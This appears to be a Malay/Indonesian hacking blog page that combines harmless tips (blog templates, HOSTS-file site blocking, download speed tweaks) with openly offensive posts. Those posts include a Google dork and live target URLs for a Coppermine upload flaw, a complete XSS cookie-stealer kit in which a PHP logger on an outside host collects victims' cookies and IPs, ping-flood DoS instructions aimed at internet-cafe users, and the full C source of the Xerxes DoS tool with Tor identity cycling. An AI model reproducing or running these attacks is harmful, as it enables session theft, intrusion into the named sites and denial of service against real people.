Cool Blogger Template Ze Cor rwxr-xr-x 0 03:33

Filename	Cool Blogger Template
Permission	rw-r--r--
Author	Ze Cor
Date and Time	03:33
Label
Action

                 B374k Template

DOWNLOAD HERE

Template Hacker Viorenza

DOWNLOAD HERE

           Template Chibi Transparent

                DOWNLOAD HERE

           Template Simple Black v.2

DOWNLOAD HERE

Coppermine Photo Gallery – Upload Vulnerability Ze Cor rwxr-xr-x 0 01:36

Filename	Coppermine Photo Gallery – Upload Vulnerability
Permission	rw-r--r--
Author	Ze Cor
Date and Time	01:36
Label
Action

Kita pakai google dork: “Powered by Coppermine Photo Gallery” 






1.taip di google dengan kata kunci “Powered by Coppermine Photo Gallery” (jangan lupa pakai tanda '')
3.Pilih salah satu menurut anda yang boleh di pakai.
4.Akan ada gambar seperti ini.

POC nya: http://[localhost]/Patch/upload.php


Live Target:
http://www.bergthaller.eu/coppermine/cpg146/upload.php
http://www.manat.no/bilder/upload.php


Preview File:
Anda boleh melihat file yang anda upload tadi


Extension File:
jpg, xlx, txt, bmp, doc, mp4, etc —> boleh support untuk: html, asp, php


Okay good luck ya ^_^

Cara Block Site tanpa Software ZuL ZaRiF rwxr-xr-x 0 00:27

Filename	Cara Block Site tanpa Software
Permission	rw-r--r--
Author	ZuL ZaRiF
Date and Time	00:27
Label
Action

1. Buka Folder “etc” ( C:\WINDOWS\system32\drivers\etc )


2. Cari file dengan nama "HOSTS"


3. Double klik file tersebut, dan pada daftar program pilih notepad, lalu klik OK.


4. Dibawah teks “127.0.0.1 localhost” tambahkan “127.0.0.2 www.contoh.com”,  dan situs tersebut tidak akan bisa lagi diakses.


5. Lalu save file tersebut (File --> Save) !


6. Selesai.




Contoh:


127.0.0.1 localhost
127.0.0.2 www.facebook.com


-->www.facebook.com sekarang tidak boleh diakses lagi<--




Untuk setiap site yang ingin kamu tambahkan, hanya tambahkan “1” untuk nombor internal ip terakhir. 
(127.0.0.2) dan kemudian tambahkan “1” seperti berikut:


127.0.0.3 www.contoh-1.com
127.0.0.4 www.contoh-2.com
127.0.0.5 www.contoh-3.com 


Dst


Cara diatas tidak akan bejaya jika tidak ditemukannya file ‘HOST’ di drive C komputer anda.
Dan cara yang mudah dilakukan adalah dengan menggunakan software, yang pasti lebih mudah ya kan!

Cara menambah kelajuan DOWNLOAD hingga 100-200kbs ZuL ZaRiF rwxr-xr-x 0 00:20

Filename	Cara menambah kelajuan DOWNLOAD hingga 100-200kbs
Permission	rw-r--r--
Author	ZuL ZaRiF
Date and Time	00:20
Label
Action

code: ETRNN5AYS59D

Untuk menambah kelajuan download hingga 100-200 kbps,  step pertama anda harus mempunyai software ajaib iaitu TCPOptimizer yang boleh di download DISINI

1. Buka program tersebut, pada tab General Setting, pilih kabel modem atau dsl yang kamu punya.

2. Pada kotak isikan MTU set nilai menjadi 1500.


3. Klik Apply changes


Anda juga boleh memilih Optimal pada bagian Choose Setting  pada tab General Setting.
Dan jika anda merasa kecepatan downloadmu masih kurang, cubalah mendownload menggunakan Internet Download Manager yang boleh anda download DISINI

Cookies Stealer ZuL ZaRiF rwxr-xr-x 2 02:29

Filename	Cookies Stealer
Permission	rw-r--r--
Author	ZuL ZaRiF
Date and Time	02:29
Label
Action

Cookies Stealer Tutorial by Ze Cor
Sign up dekat free hosting , pastu pergi dekat file manager dan tekan public_html...kemudian create new file , copy code dibawah ni -ze-

1. Logger [save as logger.php]

<?php
$cookie = $HTTP_GET_VARS["cookie"];$date = date ("j F Y h:i:s A");$ip = $_SERVER['REMOTE_ADDR'];$agent = $_SERVER['HTTP_USER_AGENT'];$referer = $_SERVER['HTTP_REFERER'];$file = fopen('logs.html', 'a');fwrite($file, "<tr><td>\n <font color='#990000' ><b>\n Cookies : </b></font>$cookie <br>\n<font color='#990000' ><b> Date : </b></font> $date <br>\n <font color='#990000' ><b> IP : </b></font> $ip <br>\n<font color='#990000' ><b>\n Referer : </b></font>$referer <br>\n<font color='#990000' ><b> Agent : </b></font> $agent <br>\n<hr><hr><br>\n</td></tr>\n");fclose($file);header( 'Location: http://www.redirectURL.com' ) ;?>

(redirect url tu tuka kepada apa apa link yang anda mahu)

2.JS Logger [save as logger.js]
[Untuk dimasukkan ke dalam XSS anda]

<script src=http://www.yourwebsite.com/logger.js>

3.Page Cookie Logs [save as logs.php]

<!-- If you wanna highlight a specific words -->

<script type="text/javascript" src="highlight.js"></script><body onload="highlightSearchTerms('Word1');highlightSearchTerms('Word2');highlightSearchTerms​('Word3')">


<head>
  <style type="text/css">


            body
            {
 overflow:visible;
            }
    .pg-normal {
    color: black;
    font-weight: normal;
    text-decoration: none;
    cursor: pointer;
    }
    .pg-selected {
    color: black;
    font-weight: bold;
    text-decoration: underline;
    cursor: pointer;
    }
  </style>


  <script type="text/javascript" src="page.js"></script>
    </head>
<body>
  <center><div id="pageNavPosition"></div></center><br><hr>
  <form action="" method="get" enctype="application/x-www-form-urlencoded">
  <table  id="results">
    <tr>
    <th></th>
    <th></th>
    </tr>


<?php include 'logs.html'; ?>
 </table>
    </form>


    <script type="text/javascript"><!--
  var pager = new Pager('results', 10);
  pager.init();
  pager.showPageNav('pager', 'pageNavPosition');
  pager.showPage(1);
    //--></script>


    </body>
</html> 

5. HTML Logs [save as logs.html]

** Buat satu page html kosong

4. JS Page [save as page.js]

[Untuk membuat page anda]

function Pager(tableName, itemsPerPage) {
    this.tableName = tableName;
    this.itemsPerPage = itemsPerPage;
    this.currentPage = 1;
    this.pages = 0;
    this.inited = false;


    this.showRecords = function(from, to) {
  var rows = document.getElementById(tableName).rows;
  // i starts from 1 to skip table header row
  for (var i = 1; i < rows.length; i++) {
    if (i < from || i > to)
    rows[i].style.display = 'none';
    else
    rows[i].style.display = '';
  }
    }


    this.showPage = function(pageNumber) {
  if (! this.inited) {
  alert("not inited");
  return;
  }


  var oldPageAnchor = document.getElementById('pg'+this.currentPage);
  oldPageAnchor.className = 'pg-normal';


  this.currentPage = pageNumber;
  var newPageAnchor = document.getElementById('pg'+this.currentPage);
  newPageAnchor.className = 'pg-selected';


  var from = (pageNumber - 1) * itemsPerPage + 1;
  var to = from + itemsPerPage - 1;
  this.showRecords(from, to);
    }


    this.prev = function() {
  if (this.currentPage > 1)
    this.showPage(this.currentPage - 1);
    }


    this.next = function() {
  if (this.currentPage < this.pages) {
    this.showPage(this.currentPage + 1);
  }
    }


    this.init = function() {
  var rows = document.getElementById(tableName).rows;
  var records = (rows.length - 1);
  this.pages = Math.ceil(records / itemsPerPage);
  this.inited = true;
    }


    this.showPageNav = function(pagerName, positionId) {
  if (! this.inited) {
  alert("not inited");
  return;
  }
  var element = document.getElementById(positionId);


  var pagerHtml = '<span onclick="' + pagerName + '.prev();" class="pg-normal"> &#171 Prev </span> | ';
  for (var page = 1; page <= this.pages; page++)
    pagerHtml += '<span id="pg' + page + '" class="pg-normal" onclick="' + pagerName + '.showPage(' + page + ');">' + page + '</span> | ';
  pagerHtml += '<span onclick="'+pagerName+'.next();" class="pg-normal"> Next »</span>';


  element.innerHTML = pagerHtml;
    }
} 

5. JS Highlight [save as highlight.js]

[**Pilihan Sahaja : Untuk membuat perkataan tertentu dihighlight seperti dalam gambar yang diatas sekali]

function doHighlight(bodyText, searchTerm, highlightStartTag, highlightEndTag)
{
  // the highlightStartTag and highlightEndTag parameters are optional
  if ((!highlightStartTag) || (!highlightEndTag)) {
    highlightStartTag = "<font style='color:blue; background-color:yellow;'><b>";
    highlightEndTag = "</font></b>";
  }
  var newText = "";
  var i = -1;
  var lcSearchTerm = searchTerm.toLowerCase();
  var lcBodyText = bodyText.toLowerCase();


  while (bodyText.length > 0) {
    i = lcBodyText.indexOf(lcSearchTerm, i+1);
    if (i < 0) {
  newText += bodyText;
  bodyText = "";
    } else {
  // skip anything inside an HTML tag
  if (bodyText.lastIndexOf(">", i) >= bodyText.lastIndexOf("<", i)) {
  // skip anything inside a <script> block
  if (lcBodyText.lastIndexOf("/script>", i) >= lcBodyText.lastIndexOf("<script", i)) {
    newText += bodyText.substring(0, i) + highlightStartTag + bodyText.substr(i, searchTerm.length) + highlightEndTag;
    bodyText = bodyText.substr(i + searchTerm.length);
    lcBodyText = bodyText.toLowerCase();
    i = -1;
  }
  }
    }
  }


  return newText;
}


function highlightSearchTerms(searchText, treatAsPhrase, warnOnFailure, highlightStartTag, highlightEndTag)
{
  if (treatAsPhrase) {
    searchArray = [searchText];
  } else {
    searchArray = searchText.split(" ");
  }


  if (!document.body || typeof(document.body.innerHTML) == "undefined") {
    if (warnOnFailure) {
  alert("Sorry, for some reason the text of this page is unavailable. Searching will not work.");
    }
    return false;
  }


  var bodyText = document.body.innerHTML;
  for (var i = 0; i < searchArray.length; i++) {
    bodyText = doHighlight(bodyText, searchArray[i], highlightStartTag, highlightEndTag);
  }


  document.body.innerHTML = bodyText;
  return true;
}/*
 * This displays a dialog box that allows a user to enter their own
 * search terms to highlight on the page, and then passes the search
 * text or phrase to the highlightSearchTerms function. All parameters
 * are optional.
 */function searchPrompt(defaultText, treatAsPhrase, textColor, bgColor)
{
  // This function prompts the user for any words that should
  // be highlighted on this web page
  if (!defaultText) {
    defaultText = "";
  }


  // we can optionally use our own highlight tag values
  if ((!textColor) || (!bgColor)) {
    highlightStartTag = "";
    highlightEndTag = "";
  } else {
    highlightStartTag = "<font style='color:" + textColor + "; background-color:" + bgColor + ";'>";
    highlightEndTag = "</font>";
  }


  if (treatAsPhrase) {
    promptText = "Please enter the phrase you'd like to search for:";
  } else {
    promptText = "Please enter the words you'd like to search for, separated by spaces:";
  }


  searchText = prompt(promptText, defaultText);


  if (!searchText)  {
    alert("No search terms were entered. Exiting function.");
    return false;
  }


  return highlightSearchTerms(searchText, treatAsPhrase, true, highlightStartTag, highlightEndTag);
}/*
 * This function takes a referer/referrer string and parses it
 * to determine if it contains any search terms. If it does, the
 * search terms are passed to the highlightSearchTerms function
 * so they can be highlighted on the current page.
 */function highlightGoogleSearchTerms(referrer)
{
  // This function has only been very lightly tested against
  // typical Google search URLs. If you wanted the Google search
  // terms to be automatically highlighted on a page, you could
  // call the function in the onload event of your <body> tag,
  // like this:
  //   <body onload='highlightGoogleSearchTerms(document.referrer);'>


  //var referrer = document.referrer;
  if (!referrer) {
    return false;
  }


  var queryPrefix = "q=";
  var startPos = referrer.toLowerCase().indexOf(queryPrefix);
  if ((startPos < 0) || (startPos + queryPrefix.length == referrer.length)) {
    return false;
  }


  var endPos = referrer.indexOf("&", startPos);
  if (endPos < 0) {
    endPos = referrer.length;
  }


  var queryString = referrer.substring(startPos + queryPrefix.length, endPos);
  // fix the space characters
  queryString = queryString.replace(/%20/gi, " ");
  queryString = queryString.replace(/\+/gi, " ");
  // remove the quotes (if you're really creative, you could search for the
  // terms within the quotes as phrases, and everything else as single terms)
  queryString = queryString.replace(/%22/gi, "");
  queryString = queryString.replace(/\"/gi, "");


  return highlightSearchTerms(queryString, false);
}


/*
 * This function is just an easy way to test the highlightGoogleSearchTerms
 * function.
 */
function testHighlightGoogleSearchTerms()
{
  var referrerString = "http://www.google.com/search?q=javascript%20highlight&start=0";
  referrerString = prompt("Test the following referrer string:", referrerString);
  return highlightGoogleSearchTerms(referrerString);
} 

Da siap pon file-file
dan anda hanya perlu bagi link anda . Contoh:
www.sitepape.x90x.net/logger.php


untuk cek , contoh : www.sitepape.x90x.net/logs.html


kalau xmenjadi jgn marah yer :3

Serangan DOS Dengan PingFlood ZuL ZaRiF rwxr-xr-x 4 22:28

Filename	Serangan DOS Dengan PingFlood
Permission	rw-r--r--
Author	ZuL ZaRiF
Date and Time	22:28
Label
Action

DOWNLOAD PING FLOOD V.1

Password : infoduniaku

* Persiapan serangan

- Modem / Router
- Komputer dengan OS Windows ( XP, Vista, 7 )
- Aplikasi Ping flood yang didownload tadi
- Putty untuk remote / Linux
- Command Prompt Windows
- Mangsa / Target yang memiliki security LOW

* Installation PingFlood

1. Extract file pingflood yang didownload tadi.
2. Copy aplikasi pingflood tersebut kedalam hardisk directory Windows C:\WINDOWS. Ingat copy hanya aplikasi ping flood.exe saja bukan foldernya.
3. Setelah pengcopian selesai cek apakah aplikasi tersebut sudah bisa digunakan. Caranya aktifkan Command Prompt dengan klik start > run > tulis cmd. Selanjutnya taip pingflood pada Command Promp, jika berhasil maka akan ada tampilan seperti ini :
4. 
   

Format perintah dari ping flood:  pingflood.exe <victim> [option]

• Pingflood.exe ertinya mengaktifkan aplikasi ping flood
• <victim> ertinya IP address atau domain website yang akan dijadikan mangsa
• [option] adalah operasi tertentu jika ingin mengirim paket DoS ping flood dengan ukuran, jumlah dan delay tertentu.

Contoh :

pingflood 192.168.1.3 -n 100 -d 50 -s 15000

Penjelasan :

• pingflood,  artinya mengaktifkan aplikasi ping flood.
• 192.168.1.3, adalah IP korban yang akan diserang menggunakan ping flood.
• -n, artinya jumlah paket yang berjumlah 100.
• -d, artinya delay tiap pengiriman paket.
• -s 15000, artinya ukuran data yang dikirim sebesar 15000 bytes.

* Praktis Serangan

Saya sarankan anda telah mengetahui IP address mangsa yang akan anda serang sebagai contoh (192.168.3.1). Saya contohkan IP nya adalah 192.168.3.1. Anda boleh mencubanya di dalam sebuah warnet, kerana dengan mudah anda boleh mengetahui IP pengguna lain didalam satu warnet. Anda boleh gunakan Tools seperti IP Scanner ataupun Net Tools.

- Aktifkan Command Prompt klik start > run > tulis cmd
- Lakukan pengujian ping ke modem korban, caranya taip ping 192.168.3.1

Pengujian diatas menunjukan pengujian ping berhasil dan keadaan normal tidak ada paket yang loss. Rata-rata waktu tempuh 0 mili second.

- Sekarang cuba Ping flood ke mangsa caranya :
Taip pada command Prompt pingflood 192.168.3.1

Akan terlihat perbezaan yang sangat segnifikan antara keadaan normal dengan keadaan pada saat melakukan ping flood atau serangan DDoS tersebut. Anda boleh lihat perbedaannya pada saat melakukan ping flood selama lebih kurang 1-3 minit lakukan ping ke modem korban, maka kalian akan melihat banyaknya jumlah paket yang loss. selama itu ping tersebut komputer korban akan dibanjiri kiriman paket data sehingga komputer korban tidak bisa beroperasi seperti normalnya.

P/S : Cara ini sebaiknya dijadikan sebagai pembelajaran saja, saya tidak akan bertanggung jawab atas penyalah gunaan cara diatas.

DDOS Tools: Xerxes DOS Tools ZuL ZaRiF rwxr-xr-x 0 22:04

Filename	DDOS Tools: Xerxes DOS Tools
Permission	rw-r--r--
Author	ZuL ZaRiF
Date and Time	22:04
Label
Action

Greeting Guest ,  Anonymous

Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester , ini source code nya:

/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
}

void broke(int s) {
    // do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0″, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}

void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00″, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}

int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

masih x paham ?


tngok video ni
 http://vimeo.com/17268609